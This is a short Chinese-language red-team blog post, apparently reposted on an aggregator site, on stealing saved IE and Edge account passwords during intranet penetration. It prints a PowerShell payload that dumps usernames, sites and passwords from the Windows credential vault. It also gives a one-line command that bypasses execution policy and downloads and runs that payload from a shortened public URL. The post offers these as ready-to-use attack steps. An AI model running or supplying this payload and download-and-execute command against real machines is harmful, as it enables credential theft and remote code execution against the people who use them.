滲透攻擊紅隊

一個專注于紅隊攻擊的公眾號

大家好，這里是?滲透攻擊紅隊?的第 41 篇文章，本公眾號會記錄一些我學習紅隊攻擊的復現筆記(由淺到深)，不出意外每天一更

Powershell

內網滲透一直以來都是一個熱門話題，試想在一個大型的內網環境下，當我們拿到了內網windows機器后，我們該如何通過他們去獲取更多的所需資源，這就需要我們進行內網滲透了。然而在內網滲透中，除了kali、metasploit等高能的存在以外，還有一款神器也常常容易遭到忽略----PowerShell

Powershell 獲取 IE 瀏覽器的賬戶密碼信息

Powershell

首先需要的是一段 Powershell Payload：

[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]$vault = New-Object Windows.Security.Credentials.PasswordVault$vault.RetrieveAll() | % { $_.RetrievePassword();$_ } | select username,resource,password

我們可以把他放到公網上，這里有老外現成的了：http://bit.ly/2K75g15

如果你不想用它的域名，你也可以把 Powershell Payload 放到你自己的公網服務器上，然后使用 Powershell 調用它即可：

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2K75g15')"

這個時候就能獲取到你 IE 瀏覽器中的緩存信息，查找你保存的賬戶和密碼信息。

---

參考文章：

https://github.com/HanseSecure/credgrap_ie_edge

滲透攻擊紅隊

一個專注于滲透紅隊攻擊的公眾號

點分享點點贊點在看

總結

以上是生活随笔為你收集整理的浏览器获取设备信息_一条命令获取 IE 浏览器保存网站的账号和密码信息的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。